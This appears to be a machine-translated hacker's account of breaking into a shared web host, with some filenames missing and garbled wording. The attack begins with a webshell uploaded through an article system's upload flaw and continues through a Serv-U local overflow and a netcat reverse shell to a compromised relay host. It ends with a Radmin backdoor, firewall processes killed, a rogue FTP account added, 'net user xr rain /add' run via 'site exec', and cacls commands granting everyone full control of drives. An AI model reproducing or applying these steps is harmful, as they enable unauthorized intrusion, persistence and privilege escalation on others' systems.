First, let’s determine the target: ***.com, a common virtual host. I believe it is not difficult for you to obtain webshell using Upfile vulnerabilities. This time we obtained this webshell, not DVBBS, but the software upload and filtering of Free Power 3.6 is not strictly uploaded and filtered. The website ***.com/lemon/ is a free power 3.6 article system. Xr uses and uploads a web *. Anyone who has used the shark knows that this is uploading the content of the asp *. So, uploaded Ocean 2005a and successfully obtained the webshell.
Test the permissions, run set in cmd, and get some information about the host. The system disk is D disk, which also shows that our webshell has running permissions. Then let’s see what’s available in C drive? Is it a dual system? After browsing, I found that there were no system files, only some junk files, and I was so dizzy. It doesn't matter, let's check again, the virtual hosts have serv-u, and this one is no exception, it is 5.0.0.8. Haha, there is a local overflow, dig haha.
Idea: Upload serv-u local overflow file and use nc to reverse connect to obtain system shell. Have you found that the uploaded component of Ocean 2005a is not easy to use (I always encounter this problem anyway). It doesn’t matter. A component-free upload was modified with rain, and there are 3 files in total, and. It is used locally as uploading to the same folder. The link address in the modification is: ***.com/lemon/ and you can upload it.
After uploading and in H:\\long\\sun***\\lemon (website directory), I found that there is no running permission. It doesn’t matter, according to experience, D:\\Documents and Settings\\All Users\\ should have run permissions under the general system. So I wanted to copy the file, but found that our webshell did not have permission to write D disk, so I was so stunned.
You can browse D:\\program files\\serv-u\\, it cannot be changed. Do you need to crack the serv-u password? I'm dizzy, don't want to.
You can't be so discouraged. I suddenly thought about why the system is not placed on disk C. Could it be that disk C is part of the FAT32 partition? (We later proved our idea. Let me say here that if the host has a system disk with win98, 99% of it is FAT32 partitioned. We have also encountered hosts with Ghost installed. In order to facilitate backup under DOS, its backup disk is generally FAT partitioned.) If the system disk is a FAT32 partition, there is no security at all on the website. Although the C drive is not a system drive, we have execution permissions. Haha, copy and to c:\\, run " -e 202.*.*.* 888", here 202.*.*.* is our broiler, before that we had run nc -l -p 888 on broiler. We are in the school’s intranet and do not have public IPs, so we are not happy.
We successfully obtained a system shell connected to broiler. (It seems simple, but in fact we have encountered setbacks here. We found that some versions of NC do not have the -e parameter, and I thought that the NC functions all over the world were the same. Later, I found that different versions of NC interconnection were not successful, and there would be garbled codes, which could not be used. For this reason, uploaded n times, made n errors, and was stupid n times, and finally succeeded. Being a hacker really has to be patient and perseverance.)
While we were happy, we were still not satisfied because this shell was too slow. So, I want to use the Radmin, which we use the most frequently, but in fact, the administrator can find r_server by pressing Alt+Ctrl+Del, and the process is checked, but I still like to use it because it will not be detected. OK, upload, r_server.exe to H:\\long\\sun***\\lemon, and then use the shell I just obtained from nc to copy them to d:\\winnt\\system32\\, and run them respectively: r_server /install , net start r_server , r_server /pass:rain /save .
After a long wait, it finally showed success. I connected it with radmin and found that the connection failed. I'm so fainted and forgot that there is a firewall. Upload pslist and pskill and find backices, *s, etc. Although they can log in after Killing, the server still doesn't work after restarting, and it's not a long-term solution. The firewall is not protected from ports 21, 80, etc., so our thinking is back to serv-u. Download it, overwrite the local machine, add a system account with username xr and password rain on the local machine serv-u, plus all permissions. Then use the old method, upload, write it into D:\\program files\\serv-u\\ using the shell, and overwrite the original one. Although I waited for a long time, I succeeded, so I connected with flashfxp, and an error of 530 occurred. Depressed, why did you fail again? (This should be fine based on experience, but why can't you figure it out? Please give me some advice.)
No matter what, we restart serv-u and it will be OK. How to restart it? We started to want to restart the system with shutdown, but then we will lose the nc shell and may be discovered. Later, my eyes lit up. Don’t we have pskill? I just used pslist to find this process: ServUDaemon . Kill it. Then run D:\\program files\\serv-u\\ , please note that it is not.
Okay, here we go up ftp and ls, haha, the system disk is under my control. Can we run system commands? Yes, so that's OK:
ftp>quote site exec net user xr rain /add
Run net user on the webshell and you can see that the addition is successful.
The entire invasion and infiltration ended at this point, and it was cleaned up after a while. We'll start the discussion. In fact, there are many good rootkits that can be used to break through the firewall, but we think that the services provided by the system are the safest backdoor.
The use of CAcls command in elevation of rights
c: /e /t /g everyone:F #Set c drive to everyone to browse
d: /e /t /g everyone:F #Set the d disk to everyone to browse
e: /e /t /g everyone:F #Set e disk to everyone to browse
f: /e /t /g everyone:F #Set the f disk to everyone to browse
F:\safe\overflow tool\sqlhello2>cacls
Display or modify the access control table (ACL) of the file
CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user [...]]
[/P user:perm [...]] [/D user [...]]
filename displays ACL.
/T Change the current directory and all subdirectories
Specify the ACL of the file.
/E Edit ACL without replacement.
/C Continue when access denial error occurs.
/G user:perm Gives the specified user access permissions.
Perm can be: R read
W Write
C Change (write)
F Full control
/R user revokes access to the specified user (only legal when used with /E ).
/P user:perm Replace the access permissions of the specified user.
Perm can be: N none
R Read
W Write
C Change (write)
F Full control
/D user Denied access to the specified user.
Multiple files can be specified using wildcard characters in the command.